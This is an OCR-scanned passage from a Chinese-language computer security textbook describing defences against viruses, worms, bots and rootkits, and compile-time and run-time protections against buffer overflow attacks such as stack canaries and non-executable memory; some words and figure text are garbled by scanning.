成 功 的 病毒 攻击 的 数量 , 但 这 个 目标 通常 来 讲 是 不 可 能 达到 的 。 下 一 个 最 好 的 方法 就 是 能 够 做 到 
如 下 几 点 : 

@ 检测 : 当 感 染发 生 时 ， 确 定 其 发 生 并 定位 病毒 。 

@ 识别 : 当 检测 成 功 时 ， 识 别 感染 程序 的 特定 病毒 。 

o 清除 : 当 特 定 病毒 被 识别 出 ， 从 被 感染 的 程序 中 清除 所 有 病毒 的 痕迹 并 将 程序 还 原 到 其 

初始 状态 。 从 所 有 被 感染 系统 中 清除 病毒 ， 以 防止 其 进一步 传播 。 

如 果 检 测 成 功 , 但 不 能 识别 或 清除 , 则 一 个 替换 方案 为 放弃 被 感染 的 程序 , 并 重新 读 取 一 个 干净 
的 备份 。 

病毒 与 反 病 毒 技 术 的 发 展 是 相互 促进 的 。 早 期 的 病毒 是 相对 简单 的 代码 片段 ， 并 可 以 被 相对 简 
单 的 反 病 毒 软件 包 所 识别 和 清除 。 随 着 病毒 竞争 的 演化 ， 不 论 是 病毒 还 是 反 病 毒 软件 都 变 得 更 加 复 
杂 和 成 熟 。 更 加 成 熟 的 反 病毒 方法 和 产品 不 断 地 出 现 。 本 节 将 着 重 介 绍 两 个 最 重要 的 技术 。 


类 属 解密 

类 属 解密 〈GD ) 技术 使 得 反 病 毒 软件 可 以 在 保持 快速 扫描 速度 的 同时 容易 地 检测 出 其 至 最 复 
杂 的 变形 病毒 INACH97]。 回 忆 一 下 ， 当 一 个 含有 变形 病毒 的 文件 被 执行 时 ， 病 毒 必须 将 自身 解密 
以 激活 。 为 了 检测 这 种 结构 ， 可 执行 文件 运行 时 要 通过 一 个 类 属 解密 扫描 器 ， 其 包含 如 下 元 素 : 

@ CPU 模拟 器 : 一 个 基于 软件 的 虚拟 计算 机 。 可 执行 文件 中 的 指令 通过 模拟 器 解释 ， 而 非 

直接 由 处 理 器 执行 。 模 拟 器 包括 所 有 寄存 器 和 其 他 处 理 器 硬件 的 软件 版 本 ， 因 此 真实 处 
理 器 并 不 受 模拟 器 所 解释 的 程序 影响 。 

© 病毒 签名 扫描 器 ;一 个 扫描 目标 代码 以 查找 已 知 病毒 签名 的 模块 。 

o 模拟 控制 模块 : 控制 目标 代码 的 执行 。 

在 每 次 模拟 的 开始 , 模拟 器 开始 逐条 解释 目标 代码 的 指令 。 这样, 如果 代码 包含 一 个 解密 程 
序 ， 解 密 并 暴露 出 病毒 ,此 代码 被 解释 出 。 事 实 上 ， 病 毒 自己 通过 暴露 病毒 来 帮助 反 病 毒 程 序 完 
成 了 这 个 工作 。 控 制 模块 周期 性 地 中 断 解 释 工 作 并 在 目标 代码 中 扫描 病毒 签名 。 

在 解释 过 程 中 , 目标 代码 不 会 对 实际 的 个 人 电脑 环境 产生 任何 危害 , 因为 指令 是 在 完全 受 控 
的 环境 中 解释 的 。 

设计 类 属 解密 ( GD ) 扫描 器 的 最 大 难题 是 确定 使 用 多 长 时 间 来 执行 每 次 解释 过 程 。 通 常 ， 
在 一 个 程序 开始 执行 后 病毒 成 分 很 快 被 激活 , 但 是 情况 未 必 都 是 这 样 。 扫描 器 仿真 某 个 程序 的 时 
间 越 长 ,发 现 隐藏 的 病毒 的 可 能 性 就 越 大 , 尽管 如 此 , 在 用 户 开始 抱怨 系统 性 能 下 降 之 前 ,， 反 病 
毒 程序 只 能 使 用 有 限 的 时 间 和 资源 。 
数字 免疫 系统 、 

数字 免疫 系统 是 一 个 由 IBM 公司 [KEPH97a, KEPH97b，WHIT99] 开 发 并 且 后 来 由 Symantes 
公司 [SYMA01] 改 进 的 防 病毒 的 综合 方法 。 开 发 它 的 动机 是 不 断 上 升 的 基于 互联 网 传播 的 病毒 的 
威胁 。 我 们 先 介绍 这 种 威胁 ， 然 后 总 结 IBM 的 方法 。 

传统 上 ， 病 毒 威胁 的 特征 是 新 病毒 和 新 变种 扩散 相对 缓慢 。 防 病毒 软件 通常 按 月 更 新 ， 并且 
这 是 以 控制 问题 。 此 外 传统 上 ， 因 特 网 在 病毒 传播 方面 起 着 比较 小 的 作用 。 但 是 正如 [CHES97 ] 指 
出 的 那样 ， 近 年 来 因特网 技术 方面 的 两 个 主要 的 趋势 已 经 对 病毒 传播 速度 产生 越 来 越 大 的 影响 。 

o 集成 化 的 邮件 系统 。 诸 如 Lotus Notes 和 Microsoft Outlook 的 系统 ， 使 发 送 给 任何 人 的 
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任何 东西 和 使 用 任何 收 到 的 东西 非常 简单 。 
© 可 移动 程序 系统 。 像 Java M ActiveX 那样 的 能 力 , 允许 程序 把 自己 从 一 个 系统 移植 到 另 
一 个 系统 。 

为 应 对 这 些 基于 因特网 能 力 而 构成 的 威胁 ，IBM 已 经 开发 了 一 个 数字 化 免疫 系统 原型 。 该 
系统 扩展 了 前 面 小 节 所 讨论 的 程序 仿真 的 应 用 并 且 提 供 了 一 套 通用 的 仿真 和 病毒 检测 系统 。 该 系 
统 的 目标 是 提供 快速 响应 时 间 , 以 便 几 乎 在 病毒 刚 产 生 时 就 可 以 消灭 它 。 当 一 种 新 病毒 进入 一 个 
组 织 时 ， 免 疫 系统 自动 捕获 它 、 分 析 它 、 增 加 检测 和 屏蔽 它 、 删 除 它 ， 并 且 向 运行 IBM 反 病毒 
软件 的 系统 传送 关于 病毒 的 信息 ， 以 便 允 许 它 在 别处 运行 之 前 就 可 以 被 发 现 。 

图 15.9 说 明 数 字 化 免疫 系统 中 典型 的 操作 步骤 ， 





15.9 ”数字 免疫 系统 


1) 每 台 PC 上 的 监控 程序 使 用 多 种 基于 系统 行为 、 程 序 的 可 疑 变 化 或 家 族 签名 的 启发 式 方 
法 来 推断 出 一 种 病毒 可 能 存在 。 监 控 程序 将 任何 它 认 为 受 感染 的 程序 发 送 给 组 织 内 的 管 
理 机 器 。 
2 ) 管理 机 器 加 密 这 个 样本 并 且 把 它 发 送 到 一 台中 心病 毒 分 析 计算 机 。 
3) 为 了 分 析 ， 这 人 台 机 器 建立 一 个 可 以 让 被 感染 程序 安全 运行 的 环境 。 用 于 此 目的 的 技术 包 
括 仿真 ， 或 者 创建 一 个 可 疑 程序 能 运行 和 受 监控 的 、 受 保护 的 环境 。 接 着 病毒 分 析 机 器 
提供 一 个 用 于 识别 和 移 除 病毒 的 指令 。 
4 ) 结果 指令 被 返还 到 管理 机 器 。 
5 ) 管理 机 器 把 这 个 指令 转发 到 受 感染 的 客户 端 。 
6 ) 该 指令 也 被 转发 到 组 织 里 的 其 他 客户 端 。 
7 ) 全 世界 的 用 户 得 到 有 规律 的 防 病毒 更 新 以 保护 其 免 受 新 病毒 的 危害 。 
数字 免疫 系统 的 成 功 依赖 于 病毒 分 析 机 器 检测 新 出 现 的 和 变异 的 病毒 株 ( virus strains ) 的 能 
伪 。 通 过 经 常 分 析 和 监控 自然 状态 下 发 现 的 病毒 , 连续 不 断 改 进 数 字 化 免疫 的 软件 以 跟 上 威胁 应 
该 是 可 能 的 。 


行为 封锁 软件 

不 像 启 发 式 或 基于 指纹 的 扫描 器 , 为 了 发 现 恶 意 活 动 , 行为 封锁 软件 与 宿主 电脑 的 操作 系统 
集成 在 一 起 并 且 实 时 地 监控 程序 行为 [CONR02，NACH02]。 行 为 封锁 软件 在 那些 潜在 的 恶意 行 
动 有 机 会 影响 系统 之 前 阻止 它们 。 受 监控 的 行为 可 能 包括 : 
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@ 试图 打开 、 查 看 、 删 除 及 (或 ) 修改 文件 。 
e BA EA AACR EE AT AARE T RARE. 
@ 修改 可 执行 文件 或 宏 的 逻辑 。 
© 修改 关键 的 系统 设置 ， 例 如 启动 设置 。 
o 电子 邮件 和 即时 通信 客户 端 发 送 可 执行 内 容 的 脚本 。 
@ 网 络 通信 的 开始 。 
15.10 说 明了 一 个 行为 封锁 者 的 操作 。 行 为 封锁 软件 在 服务 器 和 台式 电脑 上 运行 ,并 且 通 
过 网 络 管理 员 设置 的 策略 接受 指示 , 以 便 让 良性 的 动作 发 生 , 但 是 当 非 法 或 者 可 疑 动作 发 生 时 进 
行 仲裁 。 该 模块 阻止 任意 可 疑 软 件 运行 。 一 个 封锁 者 将 代码 隔离 到 一 个 沙 盒 中 , 它 阻止 代码 访问 
多 种 操作 系统 资源 和 应 用 程序 。 然 后 封锁 者 发 出 一 个 警告 。 
3. 服务 器 的 行为 封锁 软件 标 
1. 管理 员 设 置 可 接受 的 软件 记 可 疑 代码 。 封 锁 者 将 可 
行为 的 策略 并 且 把 它们 上 疑 代 码 封 入 沙 盒 以 防止 


传 到 一 台 服 务 器 。 策 略 也 其 继续 执行 。 
可 以 传 到 桌面 机 。 








管理 员 m Y 设法 穿越 
还 休 和 全 防火 墙 
4. 服务 器 提醒 管理 员 可 疑 代码 为 封锁 
已 经 被 标识 和 封 入 沙 盒 ， 等 软件 的 
待 管理 员 决 定 是 删除 代码 服务 器 
还 是 让 其 继续 运行 3 


15.10 行为 封锁 软件 的 操作 


因为 一 个 行为 封锁 者 能 以 实时 的 方式 堵塞 可 疑 的 软件 , 它 优 于 像 指纹 或 者 启发 式 所 建立 的 防 
病毒 检测 技术 。 当 有 简直 数 万 亿 种 方式 来 混 编 和 重组 一 种 病毒 或 里 虫 的 指令 时 , 它们 中 的 许多 将 
躲避 一 个 指纹 扫描 器 或 者 启发 式 的 检测 , 最 终 恶 意 代码 必须 向 操作 系统 提供 明确 的 请 求 。 考 虑 到 
行为 封锁 者 能 解释 所 有 这 样 的 请 求 , 不 管 程序 逻辑 显得 多 么 模糊 , 它 都 可 以 识别 和 阻止 可 疑 的 行 
为 。 

单独 使 用 行为 封锁 有 局 限 性 。 因 为 在 所 有 的 行为 被 识别 前 ,恶意 代码 必须 在 目标 机 器 上 运行 ， 
它 可 能 在 被 检测 和 阻止 前 造成 破坏 。 例如, 在 感染 一 个 单独 文件 并 且 被 堵塞 之 前 ,一 种 新 病毒 可 
能 在 硬盘 驱动 周围 弄 乱 许多 似乎 不 重要 的 文件 。 即 使 实际 感染 被 阻塞 ,用户 可 能 找 不 到 他 的 文件 ， 
导致 生产 率 的 损失 或 者 可 能 更 糟 。 


15.4.2 ate 


处 理 病 毒 和 蠕虫 的 技术 有 相当 多 的 重 倒 。 一 旦 蠕虫 侵入 机 器 ， 可 以 用 反 病 毒 软件 来 检测 它 。 
另外 ， 因 为 蠕虫 传播 产生 相当 多 的 网 络 活动 ， ote 

首先 ， 让 我 们 考虑 一 个 有 效 的 映 虫 对 策 方案 的 要 求 : 

o 一 般 性 : 采用 的 方法 能 应 付 多 种 蠕虫 攻击 ， 包 括 多 态 蠕虫 (polymorphic worms )。 

o 及 时 性 : 该 方法 应 该 反应 迅速 ， 以 便 限 制 被 感染 系统 的 数量 和 由 被 感染 系统 产生 的 传输 

数量 。 
© 适应 性 : 该 方法 应 该 对 攻击 者 为 躲避 蠕虫 对 策 而 采用 的 躲避 技术 具有 抵抗 力 。 
@ 最 小 的 拒绝 服务 代价 ;该 方法 应 该 导致 能 力 或 者 服务 方面 的 最 小 削弱 ， 这 种 削弱 是 对 策 
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软件 的 行动 导致 的 。 也 就 是 说 ,试图 控制 蠕虫 传播 ， 对 策 不 应 该 明显 干扰 正常 的 操作 。 

o 透明 性 : 对 策 软件 和 设备 不 应 该 要 求 修改 现 有 的 ( 遗留 ) 操作 系统 、 应 用 软件 和 硬件 。 

o 全 球 和 本 地 的 覆盖 : 该 方法 应 该 能 应 对 企业 网 内 部 和 外 部 的 攻击 源 。 

现 有 的 蠕虫 对 策 方 案 都 无 法 满足 所 有 这 些 要 求 。 因此, 系统 管理 员 通 常 需要 使 用 多 种 方法 来 

防御 蠕虫 攻击 。 

以 下 [JHI07 ] 我 们 列举 6 类 蠕虫 防御 措施 : : 

A. 基于 签名 的 蠕虫 扫描 策略 : 这 类 方法 产生 一 个 蠕虫 签名 ， 它 用 于 在 进入 /离开 一 个 网 络 / 主 
机 时 防止 蠕 忠 扫描 。 通 常 ， 该 方法 包括 识别 可 疑 的 流 和 生成 一 个 蠕虫 签名 。 该 方法 易 受 
多 态 蠕 虫 的 伤害 ,要 么 检测 软件 遗漏 了 蠕虫 ， 要么 如 果 检 测 软 件 足 够 复杂 到 能 对 付 多 态 
蠕虫 ， 该 方案 可 能 需要 很 长 时 间 来 响应 。[NEWS05] 是 该 方法 的 一 个 例子 。 

B. 基于 过 滤器 的 蠕虫 抑制 : 该 方法 与 A 类 相似 但 集中 于 蠕虫 的 内 容 而 非 一 个 扫描 签名 。 过 
滤器 检查 一 条 消息 以 决定 它 是 否 包含 蠕虫 代码 。Vigilante [COST05] 是 一 个 例子 , 它 依靠 
在 主机 端的 联合 蠕虫 检测 。 该 方法 可 能 十 分 有 效 但 是 需要 有 效 的 检测 算法 和 迅速 的 警告 
传播 机 制 。 

C. 基于 有 效 载荷 分 类 的 蠕虫 抑制 : 这 些 基于 网 络 的 技术 检查 包 查 看 它们 是 否 包含 蠕虫 。 可 
以 使 用 各 种 各 样 的 异常 检测 技术 ， 但 是 需要 当心 的 是 避免 误 报 率 和 漏 报 率 的 高 水 平 。 
[CHIN05] 报告 了 这 种 方法 的 一 个 例子 ， 它 在 网 络 流 中 寻找 漏洞 检测 代码 。 该 方法 没有 
生成 基于 字 节 模式 的 签名 而 是 寻找 表明 漏洞 检测 的 控制 和 数据 流 的 结构 。 

D. 阅 值 随机 移动 扫描 检测 : 阔 值 随机 移动 TRW ) 利用 随机 性 来 选取 连接 目的 地 ， 将 此 作 
为 检测 是 否 存 在 一 个 扫描 器 在 运行 的 方法 [JUNG04]。TRW 适合 部 署 在 高 速 、 低 成 本 的 
网 络 设备 上 。 这 上 比 那些 在 蠕虫 扫描 中 的 通用 行为 更 有 效 。 

E. 速度 限制 : 该 类 方法 限制 来 自 被 感染 的 主机 有 扫描 特征 的 流量 速率 。 可 以 使 用 多 种 策略 ， 
包括 限制 一 个 主机 在 一 个 时 间 段 内 能 够 连接 的 新 机 器 的 数量 、 检 测 一 个 高 链接 失败 率 和 
限制 一 个 主机 在 一 个 时 间 段 内 可 以 扫描 的 唯一 的 IP 地 址 数量 。[CHEN04] 是 一 个 例子 。 
这 类 对 策 可 能 对 普通 流量 带 来 高 延迟 。 这 种 对 策 同样 无 法 适用 缓慢 隐 滞 的 蠕虫 ， 这 种 蠕 
虫 传播 得 很 慢 ， 以 躲避 基于 活动 级 别 的 检测 。 

F. 速度 阻止 : 当 输 出 连接 速度 或 连接 企图 的 多 样 性 超过 某 个 阅 值 时 ,该 方法 立刻 阻止 输出 
流量 [JHI07]。 该 方法 必须 包含 以 一 种 透明 的 方式 快速 解除 阻塞 那些 被 错误 阻塞 的 主机 的 
办 法 。 速度 阻止 可 以 与 基于 签名 或 过 滤器 的 方法 结合 , 以 便 一 旦 生成 一 个 签名 或 过 滤器 ， 
每 个 被 阻塞 的 主机 都 能 解除 阻塞 。 速 度 阻止 似乎 提供 了 一 个 非常 有 效 的 对 策 。 和 速度 限 
制 一 样 ， 速 度 阻 止 技术 也 不 适合 慢 的 、 隐 项 的 蠕虫 。 


15.43 自动 代理 程序 的 对 策 


本 章 讨论 的 许多 对 策 都 对 对 抗 自动 代理 程序 有 意义 ， 包 括 人 侵 检测 系统 (IDS) 和 数字 免疫 
系统 。 一 旦 自动 代理 程序 被 激活 并 且 展 开 攻 击 , 这 些 对 策 都 能 够 用 来 检测 攻击 。 但 是 首要 的 目的 
是 设法 在 自动 代理 程序 自动 创建 的 时 候 检 测 和 禁用 它 。 


15.4.4 rootkit 对 策 


rootkit 非常 难于 检测 和 消灭 ， 尤 其 是 内 核 级 别 的 rootkit。 许 多 可 以 用 来 检测 rootkit REN 
痕迹 的 系统 管理 工具 都 能 被 rootkit 精确 地 破坏 ， 因 此 rootkit 不 能 被 检测 到 。 

需要 多 种 网 络 和 计算 机 级 别 的 安全 工具 来 对 付 rootkit。 基 于 网 络 和 基于 主机 的 人 侵 检 测 系 统 
都 可 以 在 传人 流量 中 查找 到 已 知 的 rootkit 攻击 的 代码 签名 。 基 于 主机 的 反 病 毒 软件 也 被 用 于 识 
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别 这 种 已 知 的 签名 。 

当然 ， 总 是 有 很 多 新 的 rootkit 和 显示 新 签名 的 现 有 rootkit 的 修改 版 本 。 这 些 情 况 下 ， 系 统 
需要 寻找 可 以 提示 rootkit 存在 的 行为 , 如 截获 系统 调用 或 与 键盘 驱动 程序 交互 的 键盘 记录 程序 。 
检测 这 些 行为 并 非 容易 ， 例 如 ， 反 病毒 软件 通常 截获 系统 调用 。 

另 一 种 方法 是 做 某 种 文件 完整 性 检查 。 一 个 例子 是 RootkitRevealer ， 它 是 一 个 来 自 
SysInternals 的 免费 软件 包 。 该 软件 包 对 利用 API 进行 的 系统 扫描 结果 和 不 调用 任何 API 指令 的 
存储 器 快照 进行 比较 。 因 为 rootkit 通过 修改 从 系统 管理 员 调用 角度 来 看 的 存储 器 的 情况 来 隐藏 
Ac, RootkitRevealer 捕获 这 个 差异 。 

如 果 检 测 到 一 个 内 核 级 别 的 rootkit, 无 论 如 何 , 唯一 的 安全 和 可 靠 的 恢复 方式 就 是 在 被 感染 
的 机 器 上 重新 安装 操作 系统 。 


15.5 ”处 理 缓冲 区 溢出 攻击 9 


发 现 并 利用 一 个 堆栈 缓冲 区 溢出 其 实 并 不 难 , 过 去 几 十 年 出 现 的 大 量 漏洞 利用 已 经 很 清楚 地 说 
明了 这 一 点 。 因 此 ， 要 么 通过 防止 溢出 的 出 现 ， 要 么 至 少 要 检测 到 并 终止 这 类 攻击 ， 总 之 ， 系 统 需 
要 能 够 抵御 这 类 攻击 。 本 节 就 将 讨论 实现 这 类 保护 的 可 行 性 方法 。 这 些 方 法 可 以 大 体 分 为 两 类 : 

@ 编译 时 防御 ， 其 目标 是 通过 加 固 程 序 来 抵御 对 新 程序 的 攻击 。 

@ 运行 时 防御 ， 其 目标 是 探测 并 阻止 对 已 有 程序 的 攻击 。 
虽然 人 们 对 于 合适 的 防御 方法 的 了 解 已 经 有 几 年 了 ,但 是 因为 现存 的 有 漏洞 软件 和 系统 的 数量 巨 
K, 因此 阻碍 了 这 些 防 御 的 开发 ; 于 是 便 激发 了 开发 者 对 于 运行 时 防御 的 兴趣 , 这 种 防御 可 以 配 
置 在 操作 系统 中 ， 可 以 升级 ， 还 可 以 为 已 经 存在 的 有 漏洞 程序 提供 一 定 的 保护 。[LHEE03] 中 提 
及 了 其 中 的 大 部 分 方法 。 


15.5.1 编译 时 防御 


编译 时 防御 的 目标 是 在 程序 编译 时 通过 配置 程序 来 探测 并 阻止 缓冲 区 溢出 。 可 以 有 4 种 做 
法 ,一 种 是 选择 一 种 不 允许 缓冲 区 溢出 的 高 级 语言 , 二 是 鼓励 安全 的 编码 规范 , 三 是 使 用 安全 的 
标准 库 ， 还 有 一 种 是 额外 加 入 代码 来 检测 栈 帧 的 崩溃 。 
编程 语言 的 选择 

一 种 可 能 的 方法 是 使 用 一 种 现代 高 级 编程 语言 编写 程序 , 这 种 语言 拥有 严格 的 变量 类 型 概念 ， 
并 且 严 格 规定 它们 允许 哪些 操作 。 这 类 语言 不 易 造 成 缓冲 区 溢出 ， 因 为 它们 的 编译 器 额外 包含 了 
自动 触发 边界 检测 的 代码 ， 从 而 免 去 了 程序 员 显 式 编写 它们 的 需要 。 这 些 语言 所 提供 的 伸缩 性 和 
安全 性 确实 需要 耗费 大 量 的 资源 ， 这 种 消耗 既 出 现在 编译 期 ， 同 时 也 出 现 一 些 额 外 代码 上 ， 这 些 
代码 必须 在 运行 期 执行 以 完成 如 缓冲 区 限制 这 一 类 的 检测 。 但 是 ， 由 于 处 理 器 效率 的 高 速 提升 ， 
如 今 上 述 这 些 不 足 已 经 不 像 以 前 那么 明显 了。 越 来 越 多 的 程序 选择 使 用 这 些 语言 编写 ， 因 此 也 就 
不 再 有 缓冲 区 滋 出 的 问题 ( 但是， 如 果 这 些 程 序 使 用 了 已 有 的 系统 库 或 使 用 了 用 不 安全 语言 编写 
的 运行 时 执行 环境 ， 那 么 它们 可 能 还 会 容易 受到 攻击 ) 。 底 层 机 器 语言 与 框架 之 间 的 距离 同样 会 
造成 指令 和 硬件 资源 的 丢失 。 这 一 点 限制 了 编写 代码 的 效率 ， 比 如 设备 驱动 程序 就 必须 与 那 类 资 
源 交 互 。 由 于 这 些 原因 ， 程 序 中 仍然 会 至 少 使 用 一 些 安全 性 稍 差 的 语言 (如 C 语 言 ) 编写 代码 。 


安全 编码 技术 
程序 员 们 应 该 意识 到 ， 如 果 使 用 像 C 这 样 的 语言 ， 那 么 指针 地 址 和 访问 存储 器 的 操作 能 力 
就 是 对 他 们 最 直接 的 一 项 需要 付出 代价 的 要 求 。C 语言 本 来 是 为 系统 开发 而 设计 的 一 种 语言 , 它 


O 本 节 的 材料 是 由 六 大 利 亚 国防 学 院 的 Lawrre Brown 提供 的 . 
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所 运行 的 系统 都 比 现在 所 使 用 的 小 得 多 ,而 且 拥 有 更 多 约束 限制 。 这 意味 着 ，C 语言 的 设计 者 们 
将 重点 更 多 地 投入 到 了 空间 利用 率 和 性 能 两 方面 , 而 不 是 投入 到 类 型 安全 方面 。 他 们 假设 程序 员 
会 十 分 小 心地 使 用 这 些 语 言 编写 代码 ， 并 且 会 负责 任 地 保证 安全 使 用 所 有 的 数据 结构 和 变量 。 
不 幸 的 是 , 几 十 年 的 经 验 告 诉 我 们 ,事实 并 非 如 此 。 从 UNIX 和 Linux 操作 系统 及 应 用 程序 
中 遗留 的 大 量 潜在 的 不 安全 代码 中 可 以 看 出 ， 其 中 有 一 些 代 码 就 有 发 生 缓冲 区 溢出 的 潜在 危险 。 
为 了 坚固 这 些 系统 , 程序 员 需 要 检查 这 些 代 码 , 用 一 种 安全 的 方式 重 写 任何 不 安全 的 代码 结 
构 。 因 为 快速 汲取 了 以 往 缓冲 区 溢出 的 漏洞 利用 的 经 验 , 因此 这 一 流程 已 经 开始 在 一 些 系统 中 进 
行 了 。 使 用 这 一 流程 的 一 个 比较 好 的 例子 就 是 OpenBSD 项 目 ， 这 个 项 目 开发 出 了 一 套 免费 、 跨 平 
台 、 基 于 4.4BSD 的 类 UNIX 的 操作 系统 。 除 了 一 些 其 他 方面 的 技术 改进 ， 程 序 员 们 还 对 已 有 代码 
实施 了 全 面 的 检查 ， 包 括 操作 系统 、 标 准 库 以 及 通用 程序 。 这 一 做 法 直接 促使 这 套 系统 被 人 们 广 
泛 认 为 是 目前 被 大 量 使 用 的 操作 系统 中 最 安全 的 操作 系统 之 一 。OpenBSD MA 2006 年 中 就 宣称 ， 
8 年 多 以 来 , 系统 在 默认 安装 情况 下 只 发 现 了 一 个 远程 漏洞 ， 这 显然 是 一 项 骄 人 的 成 绩 。 微 软 也 已 
经 实施 了 一 个 重点 工程 来 检查 他 们 现 有 的 代码 ， 部 分 原因 是 为 了 回应 目前 仍 在 继续 的 有 关 他 们 的 
操作 系统 和 应 用 程序 中 存在 的 漏洞 数量 的 负面 宣传 ， 这 些 漏洞 中 就 包括 很 多 缓冲 区 溢出 问题 。 虽 
然 他 们 声称 新 版 Vista 操作 系统 将 会 从 这 一 过 程 中 受益 良 多 ， 但 这 显然 已 经 成 为 一 个 艰难 的 过 程 。 


语言 扩展 及 使 用 安全 库 

SHS C 语言 中 可 能 出 现 不 安全 数组 和 指针 引用 等 问题 ， 上 自前 已 有 一 些 建议 希望 参数 编译 
器 能 够 自动 为 那些 引用 插入 边界 检查 。 员 然 对 于 静态 分 配 的 数组 来 说 这 样 做 非常 容易 , 但 是 , 如 
果 处 理 动态 分 配 的 内 存 就 会 出 现 很 多 问题 , 因为 信息 大 小 在 编译 期 是 不 知道 的 。 处理 这 类 内 存 需 
要 一 种 对 指针 语义 的 扩展 ， 用 来 包含 边界 信息 和 库 函 数 的 使 用 ， 以 保证 这 些 值 能 够 被 正确 设 定 。 
[LHEE03] 中 列举 了 几 个 这 样 的 方法 。 然 而 ， 使 用 这 类 方法 一 般 会 造成 性 能 损失 ， 这 一 点 不 一 定 
能 被 接受 。 同 时 , 这 些 方法 也 要 求 所 有 需要 这 种 安全 特性 的 程序 和 库 要 使 用 修改 后 的 编译 器 重新 
编译 。 虽然 这 对 于 一 个 刚刚 发 布 的 操作 系统 以 及 它 的 附属 程序 可 能 是 可 行 的 , 但 是 对 于 第 三 方 应 
用 程序 ， 这 样 做 仍然 可 能 出 现 问题 。 

对 于 C 语言 ， 人 们 普遍 关注 的 问题 来 自 于 它 对 非 安全 标准 库 函 数 的 使 用 上 ， 尤 其 是 一 些 字 
符 串 处 理 泪 数 。 一 个 改善 系统 安全 性 的 方法 是 将 这 些 库 函数 蔡 换 为 更 安全 的 变 体 。 这 包括 提供 新 
的 方法 ， 如 BSD 系列 系统 中 (包括 OpenBSD) 的 stzlcpy() 方 法 。 使 用 这 些 方法 需要 重 写 源 
代码 以 使 它们 与 新 的 更 安全 的 语义 保持 一 致 。 或 者 选择 只 将 标准 字符 串 库 蔡 换 为 更 安全 的 版 本 。 
Libsafe 是 采用 这 个 方法 的 一 个 比较 著名 的 例子 ， 它 实现 了 这 些 标 准 语义 ， 同 时 包含 了 额外 的 
检查 来 确保 复制 操作 没有 延伸 到 栈 帧 中 局 部 变量 空间 以 外 的 地 方 。 所 以 , 虽然 它 不 能 防止 临近 局 
部 变量 的 般 泪 , 但 却 能 够 防止 对 原 有 栈 帧 的 任何 修改 , 并 返回 地 址 值 , 因此 阻止 了 我 们 之 前 检查 
到 的 传统 栈 缓冲 区 溢出 类 型 攻击 。 这 种 库 被 实现 为 一 种 动态 库 ， 安 排 在 已 存在 标准 库 之 前 载 人 ， 
MA, 假如 它们 是 动态 的 获取 标准 库 方法 ( 像 大 多 数 程序 的 做 法 一 样 ) , 那么 就 能 因此 为 已 有 程 
序 提供 保护 而 不 必 重 新 编译 它们 。 值得 注意 的 是 , 更 改 后 的 库 代 码 在 执行 效率 方面 至 少 与 标准 库 
是 一 样 的 ， 因 此 使 用 它 保 护 已 有 程序 免 受 一 些 形式 的 缓冲 区 溢出 攻击 是 一 种 非常 容易 的 方法 。 


栈 保护 机 制 

保护 程序 免 受 传统 的 栈 溢出 攻击 的 一 个 有 效 方法 就 是 为 函数 配备 进入 和 退出 代码 的 标示 ,并 
检查 栈 空 间 避 免 甬 泪 的 出 现 。 如 果 发 现任 何 更 改 , 则 终止 程序 而 不 是 放任 攻击 继续 进行 。 有 很 多 
种 方法 能 够 提供 这 种 保护 ， 那 是 我 们 下 面 要 讨论 的 内 容 。 

Stackguard 是 最 著名 的 保护 机 制 之 一 。 它 是 一 个 扩展 GCC 编译 器 ,插入 了 额外 的 函数 进入 
和 退出 代码 。 在 系统 为 局 部 变量 分 配 地 址 空间 之 前 , 新 加 入 的 函数 入口 代 码 在 旧 栈 帧 指针 地 址 下 
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写 和 人 一 个 canary? 值 ;而 在 系统 继续 进行 常规 的 退出 操作 来 保存 旧 栈 帧 指针 和 将 调用 传 回 返回 地 
址 之 前 ， 新 加 入 的 函数 退出 代码 则 要 检查 这 个 canary 值 是 否 被 更 改 。 而 任何 企图 利用 传统 栈 溢 
出 的 攻击 来 改变 旧 栈 帧 指针 和 返回 地 址 都 必须 先 改变 这 个 canary 值 ， 因 此 就 能 探测 到 这 种 攻击 
从 而 终止 程序 的 运行 。 为 了 成 功 地 对 函数 进行 保护 ， 有 一 点 至 关 重 要 ， 即 这 个 canary 值 必须 是 
不 可 预知 的 ， 而 且 应 该 在 不 同系 统 中 拥有 不 同 的 值 。 如 果 不 是 这 样 ， 攻 击 者 将 很 容易 就 能 让 
shellcode 中 包含 所 需 位 置 上 的 正确 canary 值 。 典 型 地 , 在 进程 创建 时 选择 一 个 随机 值 作 为 canary 
值 , 然 后 将 它 保存 为 进程 状态 的 一 部 分 。 接 着 加 入 函数 人 口 和 退出 处 的 代码 就 可 以 使 用 这 个 值 了 。 

使 用 这 个 方法 存在 很 多 问题 。 首 先 ， 它 需要 所 有 需要 保护 的 程序 都 重新 编译 。 其 次 ， 由 于 栈 
帧 的 结构 已 经 改变 ， 这 可 能 导致 一 些 程序 出 现 问题 ， 如 分 析 栈 帧 的 调试 器 。 然 而 canary 技术 已 
经 用 来 重新 编译 整个 Linux 分 发 版 , 并 且 为 之 提供 了 对 栈 滋 出 攻击 的 高 抵抗 性 。 通 过 使 用 微软 的 
/GS Visual C++ 编译 器 选项 编译 ， 类 似 的 功能 对 Windows 程序 也 是 可 用 的 。 
15.5.2 ”运行 时 防御 

如 前 所 述 , 大 多 数 的 编译 时 方法 都 需要 重新 编译 已 有 程序 。 因 此 人 们 便 开 始 对 运行 时 防御 感 
兴趣 ， 这 种 防御 可 以 发 布 为 操作 系统 的 升级 程序 来 为 一 些 已 有 的 含有 漏洞 的 程序 提供 一 些 保护 。 
这 些 防 御 涉 及 对 进程 虚拟 地 址 空间 存储 管理 的 改进 。 这些 改进 要 么 是 改变 内 存 边 界 属性 值 , BA 
是 充分 预测 那些 难以 阻止 很 多 种 类 型 攻击 的 目标 缓冲 区 的 位 置 。 
可 执行 的 地 址 空间 保护 

很 多 缓冲 区 溢出 攻击 都 涉及 复制 机 器 代码 到 一 个 目标 缓冲 区 , 然后 传人 执行 指令 。 一 种 可 能 
的 防御 是 阻止 代码 在 栈 中 的 执行 ， 并 假设 应 该 只 能 在 进程 地 址 空间 的 其 他 位 置 找到 可 执行 代码 。 

为 了 有 效 支 持 这 种 特性 ， 就 需要 处 理 器 的 存储 器 管理 单元 ( MMU ) 能 够 将 虚拟 内 存 的 页 都 
标志 为 不 可 执行 的 。 一 些 处 理 器 ， 如 Solaris 使 用 的 SPARC, 已 经 支持 这 一 功能 有 一 段 时 间 了 。 
想 要 将 这 种 特性 应 用 于 Solaris 只 需要 简单 地 更 改 一 个 内 核 参数 。 而 对 于 其 他 处 理 器 ， 像 x86 系 
